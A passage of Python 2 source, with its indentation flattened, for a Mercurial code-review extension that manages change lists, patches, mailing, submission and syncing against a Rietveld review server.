#######################################################################
# CONTRIBUTORS file parsing
contributors = {}
def ReadContributors(ui, repo):
global contributors
try:
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
ui.write("warning: cannot open %s: %s\n" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
return
for line in f:
# CONTRIBUTORS is a list of lines like:
# Person <email>
# Person <email> <alt-email>
# The first email address is the one used in commit logs.
if line.startswith('#'):
continue
m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
if m:
name = m.group(1)
email = m.group(2)[1:-1]
contributors[email.lower()] = (name, email)
for extra in m.group(3).split():
contributors[extra[1:-1].lower()] = (name, email)
def CheckContributor(ui, repo, user=None):
set_status("checking CONTRIBUTORS file")
user, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user=None, warn=True):
if not user:
user = ui.config("ui", "username")
if not user:
raise hg_util.Abort("[ui] username is not configured in .hgrc")
user = user.lower()
m = re.match(r".*<(.*)>", user)
if m:
user = m.group(1)
if user not in contributors:
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return user, None
user, email = contributors[user]
return email, "%s <%s>" % (user, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.
hgversion = hg_util.version()
# We require Mercurial 1.9 and suggest Mercurial 2.0.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.0"
old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".
To install a new Mercurial, use
sudo easy_install mercurial=="""+hg_suggested+"""
or visit http://mercurial.selenic.com/downloads/.
"""
linux_message = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < hg_required:
msg = old_message
if os.access("/etc/mercurial", 0):
msg += linux_message
raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
def __init__(self, ui):
self.ui = ui
ui.pushbuffer()
self.oldQuiet = ui.quiet
ui.quiet = True
self.oldVerbose = ui.verbose
ui.verbose = False
def output(self):
ui = self.ui
ui.quiet = self.oldQuiet
ui.verbose = self.oldVerbose
return ui.popbuffer()
def to_slash(path):
if sys.platform == "win32":
return path.replace('\\', '/')
return path
def hg_matchPattern(ui, repo, *pats, **opts):
w = uiwrap(ui)
hg_commands.status(ui, repo, *pats, **opts)
text = w.output()
ret = []
prefix = to_slash(os.path.realpath(repo.root))+'/'
for line in text.split('\n'):
f = line.split()
if len(f) > 1:
if len(pats) > 0:
# Given patterns, Mercurial shows relative to cwd
p = to_slash(os.path.realpath(f[1]))
if not p.startswith(prefix):
print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
else:
ret.append(p[len(prefix):])
else:
# Without patterns, Mercurial shows relative to root (what we want)
ret.append(to_slash(f[1]))
return ret
def hg_heads(ui, repo):
w = uiwrap(ui)
ret = hg_commands.heads(ui, repo)
if ret:
raise hg_util.Abort(ret)
return w.output()
noise = [
"",
"resolving manifests",
"searching for changes",
"couldn't find merge tool hgmerge",
"adding changesets",
"adding manifests",
"adding file changes",
"all local heads known remotely",
]
def isNoise(line):
line = str(line)
for x in noise:
if line == x:
return True
return False
def hg_incoming(ui, repo):
w = uiwrap(ui)
ret = hg_commands.incoming(ui, repo, force=False, bundle="")
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_log(ui, repo, **opts):
for k in ['date', 'keyword', 'rev', 'user']:
if not opts.has_key(k):
opts[k] = ""
w = uiwrap(ui)
ret = hg_commands.log(ui, repo, **opts)
if ret:
raise hg_util.Abort(ret)
return w.output()
def hg_outgoing(ui, repo, **opts):
w = uiwrap(ui)
ret = hg_commands.outgoing(ui, repo, **opts)
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_pull(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True # for file list
err = hg_commands.pull(ui, repo, **opts)
for line in w.output().split('\n'):
if isNoise(line):
continue
if line.startswith('moving '):
line = 'mv ' + line[len('moving '):]
if line.startswith('getting ') and line.find(' to ') >= 0:
line = 'mv ' + line[len('getting '):]
if line.startswith('getting '):
line = '+ ' + line[len('getting '):]
if line.startswith('removing '):
line = '- ' + line[len('removing '):]
ui.write(line + '\n')
return err
def hg_push(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True
err = hg_commands.push(ui, repo, **opts)
for line in w.output().split('\n'):
if not isNoise(line):
ui.write(line + '\n')
return err
def hg_commit(ui, repo, *pats, **opts):
return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.
commit_okay = False
def precommithook(ui, repo, **opts):
if commit_okay:
return False # False means okay.
ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
return True
#######################################################################
# @clnumber file pattern support
# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
match_repo = None
match_ui = None
match_orig = None
def InstallMatch(ui, repo):
global match_repo
global match_ui
global match_orig
match_ui = ui
match_repo = repo
from mercurial import scmutil
match_orig = scmutil.match
scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
taken = []
files = []
pats = pats or []
opts = opts or {}
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if clname == "default":
files = DefaultFiles(match_ui, match_repo, [])
else:
if not GoodCLName(clname):
raise hg_util.Abort("invalid CL name " + clname)
cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
if err != '':
raise hg_util.Abort("loading CL " + clname + ": " + err)
if not cl.files:
raise hg_util.Abort("no files in CL " + clname)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
# work-around for http://selenic.com/hg/rev/785bbc8634f8
if not hasattr(ctx, 'match'):
ctx = ctx[None]
return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.
#######################################################################
# hg change
def change(ui, repo, *pats, **opts):
"""create, edit or delete a change list
Create, edit or delete a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
if codereview_disabled:
return codereview_disabled
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
return "cannot specify CL name and file patterns"
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
return err
if not cl.local and (opts["stdin"] or not opts["stdout"]):
return "cannot change non-local CL " + name
else:
name = "new"
cl = CL("new")
if repo[None].branch() != "default":
return "cannot create CL outside default branch"
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
return "cannot use -d and -D together"
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
return "cannot use "+flag+" with file patterns"
if opts["stdin"] or opts["stdout"]:
return "cannot use "+flag+" with -i or -o"
if not cl.local:
return "cannot change non-local CL " + name
if opts["delete"]:
if cl.copied_from:
return "original author must delete CL; hg change -D will remove locally"
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
return "error parsing change list: line %d: %s" % (line, err)
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if clx.private != cl.private:
cl.private = clx.private
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
return err
dirty[cl] = True
for d, _ in dirty.items():
name = d.name
d.Flush(ui, repo)
if name == "new":
d.Upload(ui, repo, quiet=True)
if opts["stdout"]:
ui.write(cl.EditorText())
elif opts["pending"]:
ui.write(cl.PendingText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
#######################################################################
# hg code-login (broken?)
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
if codereview_disabled:
return codereview_disabled
MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
if repo[None].branch() != "default":
return "cannot run hg clpatch outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
"""undo the effect of a CL
Creates a new CL that undoes an earlier CL.
After creating the CL, opens the CL text for editing so that
you can add the reason for the undo to the description.
"""
if repo[None].branch() != "default":
return "cannot run hg undo outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
"""apply a CL to the release branch
Creates a new CL copying a previously committed change
from the main branch to the release branch.
The current client must either be clean or already be in
the release branch.
The release branch must be created by starting with a
clean client, disabling the code review plugin, and running:
hg update weekly.YYYY-MM-DD
hg branch release-branch.rNN
hg commit -m 'create release-branch.rNN'
hg push --new-branch
Then re-enable the code review plugin.
People can test the release branch by running
hg update release-branch.rNN
in a clean client. To return to the normal tree,
hg update default
Move changes since the weekly into the release branch
using hg release-apply followed by the usual code review
process and hg submit.
When it comes time to tag the release, record the
final long-form tag of the release-branch.rNN
in the *default* branch's .hgtags file. That is, run
hg update default
and then edit .hgtags as you would for a weekly.
"""
c = repo[None]
if not releaseBranch:
return "no active release branches"
if c.branch() != releaseBranch:
if c.modified() or c.added() or c.removed():
raise hg_util.Abort("uncommitted local changes - cannot switch branches")
err = hg_clean(repo, releaseBranch)
if err:
return err
try:
err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
if err:
raise hg_util.Abort(err)
except Exception, e:
hg_clean(repo, "default")
raise e
return None
def rev2clname(rev):
# Extract CL name from revision description.
# The last line in the description that is a codereview URL is the real one.
# Earlier lines might be part of the user-written description.
all = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
if len(all) > 0:
return all[-1]
return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
if codereview_disabled:
return codereview_disabled
if mode == "undo" or mode == "backport":
# Find revision in Mercurial repository.
# Assume CL number is 7+ decimal digits.
# Otherwise is either change log sequence number (fewer decimal digits),
# hexadecimal hash, or tag name.
# Mercurial will fall over long before the change log
# sequence numbers get to be 7 digits long.
if re.match('^[0-9]{7,}$', clname):
for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
rev = repo[r]
# Last line with a code review URL is the actual review URL.
# Earlier ones might be part of the CL description.
n = rev2clname(rev)
if n == clname:
found = True
break
if not found:
return "cannot find CL %s in local repository" % clname
else:
rev = repo[clname]
if not rev:
return "unknown revision %s" % clname
clname = rev2clname(rev)
if clname == "":
return "cannot find CL name in revision description"
# Create fresh CL and start with patch that would reverse the change.
vers = hg_node.short(rev.node())
cl = CL("new")
desc = str(rev.description())
if mode == "undo":
cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
else:
cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
v1 = vers
v0 = hg_node.short(rev.parents()[0].node())
if mode == "undo":
arg = v1 + ":" + v0
else:
vers = v0
arg = v0 + ":" + v1
patch = RunShell(["hg", "diff", "--git", "-r", arg])
else: # clpatch
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
if patch == emptydiff:
return "codereview issue %s has no diff" % clname
# find current hg version (hg identify)
ctx = repo[None]
parents = ctx.parents()
id = '+'.join([hg_node.short(p.node()) for p in parents])
# if version does not match the patch version,
# try to update the patch line numbers.
if vers != "" and id != vers:
# "vers in repo" gives the wrong answer
# on some versions of Mercurial. Instead, do the actual
# lookup and catch the exception.
try:
repo[vers].description()
except:
return "local repository is out of date; sync to get %s" % (vers)
patch1, err = portPatch(repo, patch, vers, id)
if err != "":
if not opts["ignore_hgpatch_failure"]:
return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
else:
patch = patch1
argv = ["hgpatch"]
if opts["no_incoming"] or mode == "backport":
argv += ["--checksync=false"]
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
except:
return "hgpatch: " + ExceptionDetail()
out, err = cmd.communicate(patch)
if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
return "hgpatch failed"
cl.local = True
cl.files = out.strip().split()
if not cl.files and not opts["ignore_hgpatch_failure"]:
return "codereview issue %s has no changed files" % clname
files = ChangedFiles(ui, repo, [])
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
if mode == "undo":
err = EditCL(ui, repo, cl)
if err != "":
return "CL created, but error editing: " + err
cl.Flush(ui, repo)
else:
ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
lines = patch.splitlines(True) # True = keep \n
delta = None
for i in range(len(lines)):
line = lines[i]
if line.startswith('--- a/'):
file = line[6:-1]
delta = fileDeltas(repo, file, oldver, newver)
if not delta or not line.startswith('@@ '):
continue
# @@ -x,y +z,w @@ means the patch chunk replaces
# the original file's line numbers x up to x+y with the
# line numbers z up to z+w in the new file.
# Find the delta from x in the original to the same
# line in the current version and add that delta to both
# x and z.
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
return None, "error parsing patch line numbers"
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
d, err = lineDelta(delta, n1, len1)
if err != "":
return "", err
n1 += d
n2 += d
lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
newpatch = ''.join(lines)
return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
data = RunShell(cmd, silent_ok=True)
deltas = []
for line in data.splitlines():
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
continue
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
deltas.append((n1, len1, n2+len2-(n1+len1)))
return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
d = 0
for (old, oldlen, newdelta) in deltas:
if old >= n+len:
break
if old+len > n:
return 0, "patch and recent changes conflict"
d = newdelta
return d, ""
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
if codereview_disabled:
return codereview_disabled
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
#######################################################################
# hg file
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
if codereview_disabled:
return codereview_disabled
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
#######################################################################
# hg gofmt
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
if codereview_disabled:
return codereview_disabled
files = ChangedExistingFiles(ui, repo, pats, opts)
files = [f for f in files if f.endswith(".go")]
if not files:
return "no modified go files"
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
raise hg_util.Abort("gofmt did not exit cleanly")
except hg_error.Abort, e:
raise
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
return
#######################################################################
# hg mail
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
if codereview_disabled:
return codereview_disabled
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
# If no reviewer is listed, assign the review to defaultcc.
# This makes sure that it appears in the
# codereview.appspot.com/user/defaultcc
# page, so that it doesn't get dropped on the floor.
if not defaultcc:
return "no reviewers listed in CL"
cl.cc = Sub(cl.cc, defaultcc)
cl.reviewer = defaultcc
cl.Flush(ui, repo)
if cl.files == []:
return "no changed files, not sending mail"
cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
def ps(ui, repo, *pats, **opts):
"""alias for hg p --short
"""
opts['short'] = True
return pending(ui, repo, *pats, **opts)
def pq(ui, repo, *pats, **opts):
"""alias for hg p --quick
"""
opts['quick'] = True
return pending(ui, repo, *pats, **opts)
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
if codereview_disabled:
return codereview_disabled
quick = opts.get('quick', False)
short = opts.get('short', False)
m = LoadAllCL(ui, repo, web=not quick and not short)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
if short:
ui.write(name + "\t" + line1(cl.desc) + "\n")
else:
ui.write(cl.PendingText(quick=quick) + "\n")
if short:
return
files = DefaultFiles(ui, repo, [])
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
#######################################################################
# hg submit
def need_sync():
raise hg_util.Abort("local repository out of date; must sync before submit")
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
if codereview_disabled:
return codereview_disabled
# We already called this on startup but sometimes Mercurial forgets.
set_mercurial_encoding_to_utf8()
if not opts["no_incoming"] and hg_incoming(ui, repo):
need_sync()
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
user = None
if cl.copied_from:
user = cl.copied_from
userline = CheckContributor(ui, repo, user)
typecheck(userline, str)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
return "no reviewers listed in CL"
if not cl.local:
return "cannot submit non-local CL"
# upload, to sync current patch and also get change number if CL is new.
if not cl.copied_from:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckFormat(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.copied_from:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
typecheck(about, str)
if not cl.mailed and not cl.copied_from: # in case this is TBR
cl.Mail(ui, repo)
# submit changes locally
message = cl.desc.rstrip() + "\n\n" + about
typecheck(message, str)
set_status("pushing " + cl.name + " to remote server")
if hg_outgoing(ui, repo):
raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")
old_heads = len(hg_heads(ui, repo).split())
global commit_okay
commit_okay = True
ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
commit_okay = False
if ret:
return "nothing changed"
node = repo["-1"].node()
# push to remote; if it fails for any reason, roll back
try:
new_heads = len(hg_heads(ui, repo).split())
if old_heads != new_heads:
# Created new head, so we weren't up to date.
need_sync()
# Push changes to remote. If it works, we're committed. If not, roll back.
try:
hg_push(ui, repo)
except hg_error.Abort, e:
if e.message.find("push creates new heads") >= 0:
# Remote repository had changes we missed.
need_sync()
raise
except:
real_rollback()
raise
# We're committed. Upload final patch, close review, add commit message.
changeURL = hg_node.short(node)
url = ui.expandpath("default")
m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
if m:
changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message
# When posting, move reviewers to CC line,
# so that the issue stops showing up in their "My Issues" page.
PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
c = repo[None]
if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
ui.write("switching from %s to default branch.\n" % releaseBranch)
err = hg_clean(repo, "default")
if err:
return err
return None
#######################################################################
# hg sync
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if codereview_disabled:
return codereview_disabled
if not opts["local"]:
err = hg_pull(ui, repo, update=True)
if err:
return err
sync_changes(ui, repo)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [])
for cl in all.values():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
if not cl.copied_from:
ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
else:
ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
return
#######################################################################
# hg upload
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if codereview_disabled:
return codereview_disabled
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
return err
if not cl.local:
return "cannot upload non-local change"
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return
#######################################################################
# Table of commands, supplied to Mercurial for installation.
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
('p', 'pending', None, 'print pending summary to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[
('s', 'short', False, 'show short result form'),
('', 'quick', False, 'do not consult codereview server'),
],
"[FILE ...]"
),
"^ps": (
ps,
[],
"[FILE ...]"
),
"^pq": (
pq,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + hg_commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^release-apply": (
release_apply,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# TODO: release-start, release-tag, weekly-tag
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^undo": (
undo,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
"""(disabled when using this extension)"""
raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
def reposetup(ui, repo):
global codereview_disabled
global defaultcc
repo_config_path = ''
# Read repository-specific options from lib/codereview/codereview.cfg
try:
repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
f = open(repo_config_path)
for line in f:
if line.startswith('defaultcc: '):
defaultcc = SplitCommaSpace(line[10:])
except:
# If there are no options, chances are good this is not
# a code review repository; stop now before we foul
# things up even worse. Might also be that repo doesn't
# even have a root. See issue 959.
if repo_config_path == '':
codereview_disabled = 'codereview disabled: repository has no root'
else:
codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
return
InstallMatch(ui, repo)
ReadContributors(ui, repo)
RietveldSetup(ui, repo)
# Disable the Mercurial commands that might change the repository.
# Only commands in this extension are supposed to do that.
ui.setconfig("hooks", "precommit.codereview", precommithook)
# Rollback removes an existing commit. Don't do that either.
global real_rollback
real_rollback = repo.rollback
repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
def JSONGet(ui, path):
try:
data = MySend(path, force_auth=False)
